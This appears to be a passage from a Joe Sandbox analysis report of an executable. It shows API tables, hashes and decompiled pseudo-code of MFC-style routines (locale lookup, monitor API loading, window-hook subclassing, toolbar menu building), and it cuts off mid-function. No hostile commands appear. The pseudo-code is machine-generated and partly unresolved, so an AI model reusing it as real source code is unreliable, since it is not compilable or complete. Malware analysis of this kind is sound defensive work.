                  0x0041d12c
                  0x0041d12e
                  0x0041d13a
                  0x0041d140
                  0x0041d144
                  0x0041d1f4
                  0x0041d1f8
                  0x0041d20b
                  0x0041d211
                  0x0041d21e
                  0x0041d220
                  0x0041d23b
                  0x0041d247
                  0x0041d24f
                  0x0041d255
                  0x0041d255
                  0x0041d21e
                  0x0041d14a
                  0x0041d152
                  0x0041d155
                  0x0041d15b
                  0x0041d163
                  0x0041d16d
                  0x0041d176
                  0x0041d184
                  0x0041d197
                  0x0041d19d
                  0x0041d1a7
                  0x0041d1ab
                  0x0041d1b3
                  0x0041d1b6
                  0x0041d1bc
                  0x0041d1c9
                  0x0041d1d5
                  0x0041d1dd
                  0x0041d1e3
                  0x0041d1e3
                  0x0041d1ab
                  0x0041d265
                  0x0041d26b
                  0x0041d278
                  0x0041d27c
                  0x0041d28c
                  0x0041d29a
                  0x0041d2a6
                  0x0041d2a8
                  0x0041d2b2
                  0x0041d2c8
                  0x0041d2ce
                  0x0041d2d4
                  0x0041d2de
                  0x0041d2e4
                  0x0041d2ee
                  0x0041d300
                  0x0041d30a
                  0x0041d312
                  0x0041d312
                  0x0041d317
                  0x0041d31f
                  0x0041d347
                  0x0041d347
                  0x00000000
                  0x0041d321
                  0x0041d321
                  0x0041d334
                  0x0041d33c
                  0x0041d34b
                  0x0041d34b
                  0x0041d34b
                  0x0041d33e
                  0x0041d345
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041d345
                  0x0041d34d
                  0x0041d34d
                  0x0041d357
                  0x00000000
                  0x0041d35c
                  0x0041d31f
                  0x0041d29c
                  0x0041d2a1

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0041D0FC
                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000260,0041D3CA,?,?), ref: 0041D12C
                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0041D140
                  • ConvertDefaultLocale.KERNEL32(?), ref: 0041D17C
                  • ConvertDefaultLocale.KERNEL32(?), ref: 0041D18A
                  • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0041D1A7
                  • ConvertDefaultLocale.KERNEL32(?), ref: 0041D1D2
                  • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0041D1DB
                  • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 0041D1F4
                  • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_0001CA13,?), ref: 0041D211
                  • ConvertDefaultLocale.KERNEL32(?), ref: 0041D244
                  • ConvertDefaultLocale.KERNEL32(00000000), ref: 0041D24D
                  • GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 0041D292
                  • _memset.LIBCMT ref: 0041D2B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                  • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                  • API String ID: 3537336938-2299501126
                  • Opcode ID: 08cbc78f7928a1b7030f64c802fcb25947cf46e16f856135de442db56c83a13a
                  • Instruction ID: 5055a041d8b6025664242cdcc6e5d04ab3b20b4860e7019f66e730600861f421
                  • Opcode Fuzzy Hash: 08cbc78f7928a1b7030f64c802fcb25947cf46e16f856135de442db56c83a13a
                  • Instruction Fuzzy Hash: 3A512271D412289ADB60DFA5DC887EEB7B4EF58300F1001EBA458E3291D7788E81DF59
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040B7ED, Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 82libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 87%
                  			E0040B7ED() {
				void* __ebx;
				void* __esi;
				void* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				signed int _t16;
				signed int _t17;
				struct HINSTANCE__* _t19;
				void* _t21;
				void* _t24;
				void* _t25;

				_t17 = _t16 ^ _t16;
				_t24 =  *0x44f5cc - _t17; // 0x0
				if(_t24 == 0) {
					_push(_t21);
					 *0x44f5d0 = E0040B793(_t17, _t21, __eflags);
					_t19 = GetModuleHandleW(L"USER32");
					__eflags = _t19 - _t17;
					if(_t19 == _t17) {
						L15:
						 *0x44f5b0 = _t17;
						 *0x44f5b4 = _t17;
						 *0x44f5b8 = _t17;
						 *0x44f5bc = _t17;
						 *0x44f5c0 = _t17;
						 *0x44f5c4 = _t17;
						 *0x44f5c8 = _t17;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t19, "GetSystemMetrics");
						 *0x44f5b0 = _t6;
						__eflags = _t6 - _t17;
						if(_t6 == _t17) {
							goto L15;
						} else {
							_t7 = GetProcAddress(_t19, "MonitorFromWindow");
							 *0x44f5b4 = _t7;
							__eflags = _t7 - _t17;
							if(_t7 == _t17) {
								goto L15;
							} else {
								_t8 = GetProcAddress(_t19, "MonitorFromRect");
								 *0x44f5b8 = _t8;
								__eflags = _t8 - _t17;
								if(_t8 == _t17) {
									goto L15;
								} else {
									_t9 = GetProcAddress(_t19, "MonitorFromPoint");
									 *0x44f5bc = _t9;
									__eflags = _t9 - _t17;
									if(_t9 == _t17) {
										goto L15;
									} else {
										_t10 = GetProcAddress(_t19, "EnumDisplayMonitors");
										 *0x44f5c4 = _t10;
										__eflags = _t10 - _t17;
										if(_t10 == _t17) {
											goto L15;
										} else {
											_t11 = GetProcAddress(_t19, "EnumDisplayDevicesW");
											 *0x44f5c8 = _t11;
											__eflags = _t11 - _t17;
											if(_t11 == _t17) {
												goto L15;
											} else {
												__eflags =  *0x44f5d0 - _t17; // 0x0
												if(__eflags == 0) {
													_push("GetMonitorInfoA");
												} else {
													_push("GetMonitorInfoW");
												}
												_t12 = GetProcAddress(_t19, ??);
												 *0x44f5c0 = _t12;
												__eflags = _t12 - _t17;
												if(_t12 == _t17) {
													goto L15;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x44f5cc = 1;
					return _t5;
				} else {
					_t25 =  *0x44f5c0 - _t17; // 0x0
					return 0 | _t25 != 0x00000000;
				}
			}



















                  0x0040b7f0
                  0x0040b7f2
                  0x0040b7f8
                  0x0040b807
                  0x0040b813
                  0x0040b81e
                  0x0040b820
                  0x0040b822
                  0x0040b8c9
                  0x0040b8c9
                  0x0040b8cf
                  0x0040b8d5
                  0x0040b8db
                  0x0040b8e1
                  0x0040b8e7
                  0x0040b8ed
                  0x0040b8f3
                  0x0040b828
                  0x0040b834
                  0x0040b836
                  0x0040b83b
                  0x0040b83d
                  0x00000000
                  0x0040b843
                  0x0040b849
                  0x0040b84b
                  0x0040b850
                  0x0040b852
                  0x00000000
                  0x0040b854
                  0x0040b85a
                  0x0040b85c
                  0x0040b861
                  0x0040b863
                  0x00000000
                  0x0040b865
                  0x0040b86b
                  0x0040b86d
                  0x0040b872
                  0x0040b874
                  0x00000000
                  0x0040b876
                  0x0040b87c
                  0x0040b87e
                  0x0040b883
                  0x0040b885
                  0x00000000
                  0x0040b887
                  0x0040b88d
                  0x0040b88f
                  0x0040b894
                  0x0040b896
                  0x00000000
                  0x0040b898
                  0x0040b898
                  0x0040b89e
                  0x0040b8a7
                  0x0040b8a0
                  0x0040b8a0
                  0x0040b8a0
                  0x0040b8ad
                  0x0040b8af
                  0x0040b8b4
                  0x0040b8b6
                  0x00000000
                  0x0040b8b8
                  0x0040b8ba
                  0x0040b8ba
                  0x0040b8ba
                  0x0040b8b6
                  0x0040b896
                  0x0040b885
                  0x0040b874
                  0x0040b863
                  0x0040b852
                  0x0040b83d
                  0x0040b8bd
                  0x0040b8c8
                  0x0040b7fa
                  0x0040b7fc
                  0x0040b806
                  0x0040b806

                  APIs
                  • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,75B8555C,0040B955,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B818
                  • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B834
                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B849
                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B85A
                  • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B86B
                  • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B87C
                  • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B88D
                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,0040DBC8,00000000,00000002,00000028), ref: 0040B8AD
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                  • API String ID: 667068680-2451437823
                  • Opcode ID: 150a876f6c0a2e6448bf27e84db6917e01c20c524be58b6b0a26430167b67732
                  • Instruction ID: ab152e668f045b02aa06dd0bfa64d67021dfdd473995cccf1f9d9a882e2a9e4c
                  • Opcode Fuzzy Hash: 150a876f6c0a2e6448bf27e84db6917e01c20c524be58b6b0a26430167b67732
                  • Instruction Fuzzy Hash: 322171BB924291BFC711AF75BCC442A3AE8F74A701724847FD102E22A1E378044D9E9D
                  Uniqueness

                  Uniqueness Score: 0.51%

                  Function 0040FF58, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 153COMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E0040FF58(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t53;
				void _t60;
				long _t61;
				void* _t68;
				void* _t69;
				void* _t71;
				signed int _t77;
				int _t79;
				signed int _t82;
				int _t86;
				void* _t93;
				void* _t97;
				long _t99;
				signed int _t100;
				WCHAR* _t102;
				intOrPtr _t103;
				void* _t105;
				void* _t108;

				_t108 = __eflags;
				_push(0x248);
				E00429294(E004389FD, __ebx, __edi, __esi);
				_t99 =  *(_t105 + 0x10);
				_t86 =  *(_t105 + 0xc);
				_push(E0040C879);
				 *(_t105 - 0x21c) = _t99;
				_t97 = E0041F599(_t86, 0x44fa10, __edi, _t99, _t108);
				if((0 | _t97 != 0x00000000) == 0) {
					E00413DD0(0x44fa10);
				}
				if( *(_t105 + 8) == 3) {
					_t100 =  *(_t97 + 0x14);
					 *(_t105 - 0x214) =  *_t99;
					_t53 =  *(E0042083D(_t86, _t97, _t100, __eflags) + 0x14) & 0x000000ff;
					 *(_t105 - 0x218) = _t53;
					__eflags = _t100;
					if(__eflags != 0) {
						E00420889(_t105 - 0x224, __eflags,  *((intOrPtr*)(_t100 + 0x1c)));
						 *(_t105 - 4) =  *(_t105 - 4) & 0x00000000;
						E0040E25B(_t100, _t86);
						 *((intOrPtr*)( *_t100 + 0x50))();
						 *(_t105 - 0x214) =  *((intOrPtr*)( *_t100 + 0xf8))();
						_t60 = SetWindowLongW(_t86, 0xfffffffc, E0040EBA4);
						__eflags = _t60 - E0040EBA4;
						if(_t60 != E0040EBA4) {
							 *( *(_t105 - 0x214)) = _t60;
						}
						 *(_t97 + 0x14) =  *(_t97 + 0x14) & 0x00000000;
						 *(_t105 - 4) =  *(_t105 - 4) | 0xffffffff;
						__eflags =  *(_t105 - 0x220);
						if( *(_t105 - 0x220) != 0) {
							_push( *((intOrPtr*)(_t105 - 0x224)));
							_push(0);
							E0041FF9A();
						}
						L21:
						_t61 = CallNextHookEx( *(_t97 + 0x28), 3, _t86,  *(_t105 - 0x21c));
						__eflags =  *(_t105 - 0x218);
						_t99 = _t61;
						if( *(_t105 - 0x218) != 0) {
							UnhookWindowsHookEx( *(_t97 + 0x28));
							_t44 = _t97 + 0x28;
							 *_t44 =  *(_t97 + 0x28) & 0x00000000;
							__eflags =  *_t44;
						}
						goto L24;
					}
					_t93 =  *(_t105 - 0x214);
					__eflags =  *(_t93 + 0x20) & 0x40000000;
					if(( *(_t93 + 0x20) & 0x40000000) != 0) {
						goto L21;
					}
					__eflags = _t53;
					if(_t53 != 0) {
						goto L21;
					}
					__eflags =  *0x44f73c - _t100; // 0x0
					if(__eflags != 0) {
						L9:
						__eflags = (GetClassLongW(_t86, 0xffffffe0) & 0x0000ffff) -  *0x44f73c; // 0x0
						if(__eflags != 0) {
							L17:
							_t68 = GetWindowLongW(_t86, 0xfffffffc);
							 *(_t105 - 0x214) = _t68;
							__eflags = _t68;
							if(_t68 != 0) {
								_t102 = L"AfxOldWndProc423";
								_t69 = GetPropW(_t86, _t102);
								__eflags = _t69;
								if(_t69 == 0) {
									SetPropW(_t86, _t102,  *(_t105 - 0x214));
									_t71 = GetPropW(_t86, _t102);
									__eflags = _t71 -  *(_t105 - 0x214);
									if(_t71 ==  *(_t105 - 0x214)) {
										GlobalAddAtomW(_t102);
										SetWindowLongW(_t86, 0xfffffffc, E0040FE0B);
									}
								}
							}
						} else {
						}
						goto L21;
					}
					_t103 = 0x30;
					E004281D0(_t97, _t105 - 0x254, _t53, _t103);
					 *((intOrPtr*)(_t105 - 0x254)) = _t103;
					_push(_t105 - 0x254);
					_t104 = L"#32768";
					_push(L"#32768");
					_push(0);
					_t77 = E0040C9E7(_t86, _t93, _t97, L"#32768", __eflags);
					 *0x44f73c = _t77;
					__eflags = _t77;
					if(_t77 == 0) {
						_t79 = GetClassNameW(_t86, _t105 - 0x210, 0x100);
						__eflags = _t79;
						if(_t79 == 0) {
							goto L17;
						}
						 *((short*)(_t105 - 0x12)) = 0;
						_t82 = E004293B0(_t105 - 0x210, _t104);
						__eflags = _t82;
						if(_t82 == 0) {
							goto L21;
						}
						goto L17;
					}
					goto L9;
				} else {
					CallNextHookEx( *(_t97 + 0x28),  *(_t105 + 8), _t86, _t99);
					L24:
					return E00429317(_t86, _t97, _t99);
				}
			}





















                  0x0040ff58
                  0x0040ff58
                  0x0040ff62
                  0x0040ff67
                  0x0040ff6a
                  0x0040ff6d
                  0x0040ff77
                  0x0040ff82
                  0x0040ff8d
                  0x0040ff8f
                  0x0040ff8f
                  0x0040ff98
                  0x0040ffaf
                  0x0040ffb2
                  0x0040ffbd
                  0x0040ffc1
                  0x0040ffc7
                  0x0040ffc9
                  0x00410053
                  0x00410058
                  0x0041005f
                  0x00410068
                  0x0041007e
                  0x00410084
                  0x0041008a
                  0x0041008c
                  0x00410094
                  0x00410094
                  0x00410096
                  0x0041009a
                  0x0041009e
                  0x004100a5
                  0x004100ab
                  0x004100b1
                  0x004100b3
                  0x004100b3
                  0x00410144
                  0x00410150
                  0x00410156
                  0x0041015d
                  0x0041015f
                  0x00410164
                  0x0041016a
                  0x0041016a
                  0x0041016a
                  0x0041016a
                  0x00000000
                  0x0041016e
                  0x0040ffcb
                  0x0040ffd1
                  0x0040ffd8
                  0x00000000
                  0x00000000
                  0x0040ffde
                  0x0040ffe0
                  0x00000000
                  0x00000000
                  0x0040ffe6
                  0x0040ffed
                  0x0041002c
                  0x00410038
                  0x0041003f
                  0x004100ed
                  0x004100f0
                  0x004100f6
                  0x004100fc
                  0x004100fe
                  0x00410100
                  0x00410107
                  0x0041010d
                  0x0041010f
                  0x00410119
                  0x00410121
                  0x00410127
                  0x0041012d
                  0x00410130
                  0x0041013e
                  0x0041013e
                  0x0041012d
                  0x0041010f
                  0x00000000
                  0x00410045
                  0x00000000
                  0x0041003f
                  0x0040fff1
                  0x0040fffb
                  0x00410006
                  0x0041000c
                  0x0041000d
                  0x00410012
                  0x00410013
                  0x00410015
                  0x0041001d
                  0x00410023
                  0x00410026
                  0x004100ca
                  0x004100d0
                  0x004100d2
                  0x00000000
                  0x00000000
                  0x004100d6
                  0x004100e2
                  0x004100e9
                  0x004100eb
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004100eb
                  0x00000000
                  0x0040ff9a
                  0x0040ffa2
                  0x00410170
                  0x00410175
                  0x00410175

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0040FF62
                    • Part of subcall function 0041F599: __EH_prolog3.LIBCMT ref: 0041F5A0
                  • CallNextHookEx.USER32(?,?,?,?), ref: 0040FFA2
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  • _memset.LIBCMT ref: 0040FFFB
                  • GetClassLongW.USER32(?,000000E0), ref: 0041002F
                  • SetWindowLongW.USER32(?,000000FC,Function_0000EBA4), ref: 00410084
                  • GetClassNameW.USER32(?,?,00000100), ref: 004100CA
                  • GetWindowLongW.USER32(?,000000FC), ref: 004100F0
                  • GetPropW.USER32(?,AfxOldWndProc423), ref: 00410107
                  • SetPropW.USER32(?,AfxOldWndProc423,?), ref: 00410119
                  • GetPropW.USER32(?,AfxOldWndProc423), ref: 00410121
                  • GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 00410130
                  • SetWindowLongW.USER32(?,000000FC,Function_0000FE0B), ref: 0041013E
                  • CallNextHookEx.USER32(?,00000003,?,?), ref: 00410150
                  • UnhookWindowsHookEx.USER32(?), ref: 00410164
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Long$HookPropWindow$CallClassNext$AtomException@8GlobalH_prolog3H_prolog3_NameThrowUnhookWindows_memset
                  • String ID: #32768$AfxOldWndProc423
                  • API String ID: 157520791-2141921550
                  • Opcode ID: 477f9c85b758973ab3a3ea37016946061aa3c85da39c832f7ac9e7fc716f4410
                  • Instruction ID: 36fc6742a3902fc3b987d56ef4adef1f9284026439dbae15b0827b2b8d740c14
                  • Opcode Fuzzy Hash: 477f9c85b758973ab3a3ea37016946061aa3c85da39c832f7ac9e7fc716f4410
                  • Instruction Fuzzy Hash: 6251A571540225ABCB21AF61DC4CBDB7BB8AF14315F1041AAF409E6291DB7C8ED1CBA9
                  Uniqueness

                  Uniqueness Score: 6.84%

                  Function 00418492, Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 394stringwindowUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E00418492(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				WCHAR* _t148;
				void* _t157;
				int _t191;
				int _t225;
				int _t227;
				int _t230;
				intOrPtr* _t241;
				intOrPtr* _t250;
				signed int* _t252;
				int _t259;
				int _t261;
				void* _t264;
				int _t314;
				void* _t335;
				int _t339;
				int _t340;
				int _t346;
				struct HWND__** _t347;
				int _t348;
				int _t349;
				struct tagMENUITEMINFOW _t350;
				int _t351;
				void* _t353;
				void* _t356;

				_t356 = __eflags;
				_t335 = __edx;
				_push(0x174);
				E0042922B(E00439052, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t353 - 0x18)) = __ecx;
				E00404820(_t353 - 0x10);
				_t337 = lstrlenW;
				 *(_t353 - 4) =  *(_t353 - 4) & 0x00000000;
				_t258 = L"ReBarWindow32";
				_t346 = lstrlenW(L"ReBarWindow32") + 1;
				_t148 = E00405860(_t353 - 0x10, _t356, _t346);
				_t347 =  *(_t353 + 0xc);
				GetClassNameW( *_t347, _t148, _t346);
				E0040E100(L"ReBarWindow32", _t353 - 0x10, lstrlenW, 0xffffffff);
				 *(_t353 - 0x14) = E0040E23A(_t258, _t353 - 0x10, lstrlenW, _t347, _t356,  *_t347);
				if(E0041744E(_t258, _t353 - 0x10, lstrlenW, _t347, _t258) != 0) {
					L37:
					_t348 = 0;
					L6:
					E004055F0( *((intOrPtr*)(_t353 - 0x10)) + 0xfffffff0);
					return E00429303(_t348);
				}
				_t259 =  *(_t353 - 0x14);
				if(_t259 == 0 || E0041EF6A(_t259, 0x440b68) == 0) {
					goto L37;
				} else {
					_t157 = E0040ED1C(_t259);
					if(_t157 == 0) {
						L7:
						E0041F9DD(_t259, _t353 - 0x78, _t337, _t347, __eflags);
						E00404820(_t353 + 8);
						E00404820(_t353 + 0xc);
						 *(_t353 - 4) = 3;
						E004141D8(_t353 - 0x4c);
						_push( *((intOrPtr*)(_t353 - 0x18)));
						 *(_t353 - 4) = 4;
						E004146FE(_t259, _t353 - 0xac, _t337, _t347, __eflags);
						 *((intOrPtr*)(_t353 - 0x180)) =  *((intOrPtr*)(_t259 + 0x98));
						 *(_t353 - 4) = 5;
						 *((intOrPtr*)(_t353 - 0x17c)) = 0x10;
						E00415E3F(_t259, _t347[3], _t353 - 0x180);
						E00415E5C(_t259, _t347[3], _t353 - 0x88);
						_t260 = L"ToolbarWindow32";
						_t339 = lstrlenW(L"ToolbarWindow32") + 1;
						GetClassNameW( *(_t353 - 0x160), E00405860(_t353 - 0x10, __eflags, _t339), _t339);
						E0040E100(L"ToolbarWindow32", _t353 - 0x10, _t339, 0xffffffff);
						_t340 = E0040E23A(_t260, _t353 - 0x10, _t339, _t347, __eflags,  *(_t353 - 0x160));
						 *(_t353 - 0x58) = _t340;
						__eflags = E0041744E(_t260, _t353 - 0x10, _t340, _t347, _t260);
						if(__eflags != 0) {
							L36:
							 *(_t353 - 4) = 4;
							E00414752(_t260, _t353 - 0xac, _t340, _t347, __eflags);
							 *(_t353 - 4) = 3;
							E004146E5(_t353 - 0x4c);
							E004055F0( &(( *(_t353 + 0xc))[0xfffffffffffffffc]));
							__eflags =  *((intOrPtr*)(_t353 + 8)) + 0xfffffff0;
							E004055F0( *((intOrPtr*)(_t353 + 8)) + 0xfffffff0);
							 *(_t353 - 4) = 0;
							E0041829E(_t260, _t353 - 0x78, _t340, _t347, __eflags);
							goto L37;
						}
						__eflags = _t340;
						if(__eflags == 0) {
							goto L36;
						}
						__eflags = E0041EF6A(_t340, 0x43f25c);
						if(__eflags == 0) {
							goto L36;
						}
						_t349 =  &(_t347[6]);
						__eflags = _t349;
						 *((intOrPtr*)(_t353 - 0x80)) =  *_t349;
						 *(_t353 - 0x54) = _t349;
						E0041453D( *(_t353 - 0x14), _t353 - 0x88);
						E004144FC(_t340, _t353 - 0x88);
						_t261 = E00415DF6(_t340);
						 *(_t353 - 0x14) = _t261;
						while(1) {
							_t261 = _t261 - 1;
							 *(_t353 - 0x24) = _t261;
							E00415E09(_t340, _t261, _t353 - 0xec);
							_t191 = IntersectRect(_t353 - 0xfc, _t353 - 0x88, _t353 - 0xec);
							__eflags = _t191;
							if(_t191 != 0) {
								break;
							}
							__eflags = _t261;
							if(_t261 > 0) {
								continue;
							}
							break;
						}
						_t350 = 0x30;
						E004281D0(_t340, _t353 - 0xdc, 0, _t350);
						 *(_t353 - 0xdc) = _t350;
						 *(_t353 - 0x28) = E00415E26(_t340);
						E00422703(_t353 - 0x3c);
						 *((intOrPtr*)(_t353 - 0x3c)) = 0x43ead8;
						 *(_t353 - 4) = 6;
						E00425833(_t353 - 0x3c,  *(_t353 - 0x14) - _t261, 0xffffffff);
						E0041F801(_t261, _t353 - 0x78, _t340, CreatePopupMenu());
						E004149F6(_t353 - 0x4c, _t353 - 0xac);
						_t351 = 0;
						while(1) {
							__eflags = _t261 -  *(_t353 - 0x14);
							if(__eflags >= 0) {
								break;
							}
							E00418F66(_t340, _t335, __eflags, _t261, _t353 - 0x20, _t353 - 0x50, _t353 - 0x1c);
							__eflags =  *(_t353 - 0x50) & 0x00000001;
							if(( *(_t353 - 0x50) & 0x00000001) != 0) {
								__eflags = _t351;
								if(_t351 == 0) {
									L29:
									_t261 = _t261 + 1;
									__eflags = _t261;
									 *(_t353 - 0x24) = _t261;
									continue;
								}
								 *((intOrPtr*)(_t353 - 0xd8)) = 0x100;
								 *((intOrPtr*)(_t353 - 0xd4)) = 0x800;
								L28:
								InsertMenuItemW( *(_t353 - 0x74), _t261, 1, _t353 - 0xdc);
								goto L29;
							}
							 *((intOrPtr*)(_t353 - 0xd8)) = 0x162;
							__eflags = E00404D40(_t353 + 8,  *((intOrPtr*)(_t353 - 0x20)));
							if(__eflags == 0) {
								E004057B0(_t261, _t353 + 0xc, _t340, _t351, __eflags);
							} else {
								E00415372(_t261, _t340, _t353 + 0xc,  *((intOrPtr*)(_t353 + 8)), 1, 0xa);
							}
							_t225 = E0040B71F(__eflags, 8);
							__eflags = _t225;
							if(_t225 == 0) {
								_t225 = 0;
								__eflags = 0;
							} else {
								 *(_t225 + 4) =  *(_t225 + 4) & 0x00000000;
								 *_t225 = 0x43ea08;
							}
							E00425959(_t353 - 0x3c, _t351, _t225);
							_t227 =  *(_t353 - 0x28);
							__eflags = _t227;
							if(_t227 == 0) {
								L24:
								_t102 = _t353 - 0xbc;
								 *_t102 =  *(_t353 - 0xbc) & 0x00000000;
								__eflags =  *_t102;
								goto L25;
							} else {
								_t230 = E004177AC(_t353 - 0x11c,  *((intOrPtr*)(_t227 + 4)),  *((intOrPtr*)(_t353 - 0x1c)), _t353 - 0x11c);
								__eflags = _t230;
								if(_t230 == 0) {
									goto L24;
								}
								CopyRect(_t353 - 0x68, _t353 - 0x10c);
								OffsetRect(_t353 - 0x68,  ~( *(_t353 - 0x68)),  ~( *(_t353 - 0x64)));
								E00415D42( *((intOrPtr*)(E00415D21(_t261, _t353 - 0x3c, _t340, _t351))), _t353 - 0xac,  *((intOrPtr*)(_t353 - 0x60)),  *((intOrPtr*)(_t353 - 0x5c)));
								_t262 = E00415D21(_t261, _t353 - 0x3c, _t340, _t351);
								_t241 = E00415D21(_t240, _t353 - 0x3c, _t340, _t351);
								 *_t241 = E00414B47(_t353 - 0x4c,  *_t240);
								E00421A9A(_t353 - 0x4c, _t353 - 0x68, GetSysColor(4));
								E004177CD( *(_t353 - 0x28), _t353 - 0x4c,  *((intOrPtr*)(_t353 - 0x1c)), 0, 0, 1);
								_t343 = E00415D21(_t262, _t353 - 0x3c, _t241, _t351);
								_t250 = E00415D21(_t262, _t353 - 0x3c, _t249, _t351);
								 *_t250 = E00414B47(_t353 - 0x4c,  *_t249);
								_t252 = E00415D21(_t250, _t353 - 0x3c, _t343, _t351);
								_t340 =  *(_t353 - 0x58);
								_t261 =  *(_t353 - 0x24);
								 *(_t353 - 0xbc) =  *_t252;
								L25:
								 *(_t353 - 0xb8) =  *(_t353 + 0xc);
								 *((intOrPtr*)(_t353 - 0xcc)) =  *((intOrPtr*)(_t353 - 0x20));
								 *((intOrPtr*)(_t353 - 0xd4)) = 0x100;
								_t351 = _t351 + 1;
								goto L28;
							}
						}
						E00415CDB(_t353 - 0x98,  *(_t353 - 0x54));
						E0041453D( *((intOrPtr*)(_t353 - 0x18)), _t353 - 0x98);
						E0040CEE5(_t353 - 0x78, __eflags, 0,  *((intOrPtr*)(_t353 - 0x98)),  *((intOrPtr*)(_t353 - 0x8c)),  *((intOrPtr*)(_t353 - 0x18)), 0);
						_t264 = 0;
						 *((intOrPtr*)( *((intOrPtr*)(_t353 + 0x10)))) = 0;
						__eflags = _t351;
						if(__eflags <= 0) {
							L35:
							 *(_t353 - 4) = 5;
							E0042271A(_t353 - 0x3c);
							 *(_t353 - 4) = 4;
							E00414752(_t264, _t353 - 0xac, 0, _t351, __eflags);
							 *(_t353 - 4) = 3;
							E004146E5(_t353 - 0x4c);
							E004055F0( &(( *(_t353 + 0xc))[0xfffffffffffffffc]));
							E004055F0( *((intOrPtr*)(_t353 + 8)) + 0xfffffff0);
							 *(_t353 - 4) = 0;
							E0041829E(_t264, _t353 - 0x78, 0, _t351, __eflags);
							_t348 = 1;
							goto L6;
						} else {
							goto L32;
						}
						do {
							L32:
							_t314 =  *(E00415D21(_t264, _t353 - 0x3c, 0, _t264));
							__eflags = _t314;
							if(_t314 != 0) {
